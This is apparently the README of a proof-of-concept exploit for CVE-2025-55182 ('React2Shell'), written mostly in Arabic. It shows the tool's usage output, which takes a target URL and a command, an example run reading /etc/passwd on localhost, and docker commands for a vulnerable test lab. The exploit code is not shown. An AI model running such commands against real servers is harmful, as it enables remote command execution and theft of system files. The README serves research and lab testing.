
React2Shell (CVE-2025-55182) POC
هذا الدليل الإثباتي (PoC) لثغرة React2Shell (CVE-2025-55182) تم تطويره لأغراض تعليمية وبحثية فقط.
يهدف إلى إظهار وجود ثغرة أمنية محددة وتأثيرها المحتمل في بيئة خاضعة للتحكم ومصرح بها وغير إنتاجية.
اطلع على مدونتي للحصول على تحليل مفصل لثغرة react2shell: https://vxsnipe.xyz/posts/react2shell/
➜ python poc.py -h
_____ ______ _____ _______ ___ _____ _ _ ______ _ _
| __ \| ____| /\ / ____|__ __|__ \ / ____| | | | ____| | | |
| |__) | |__ / \ | | | | ) | (___ | |__| | |__ | | | |
| _ /| __| / /\ \| | | | / / \___ \| __ | __| | | | |
| | \ \| |____ / ____ \ |____ | | / /_ ____) | | | | |____| |____| |____
|_| \_\______/_/ \_\_____| |_| |____|_____/|_| |_|______|______|______|
usage: poc.py [-h] -u URL -c COMMAND
CVE-2025-55182 POC by 0xSN1PE
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://localhost:3000/)
-c, --command COMMAND
Command to execute (e.g., 'id')
➜ python poc.py -u http://localhost:3000/ -c 'cat /etc/passwd'
يأتي هذا الدليل الإثباتي مع ملف docker يمكن استخدامه لمحاكاة ثغرة react2shell في بيئة آمنة وخاضعة للتحكم.
docker build -t react2shell .
docker run -p 3000:3000 react2shell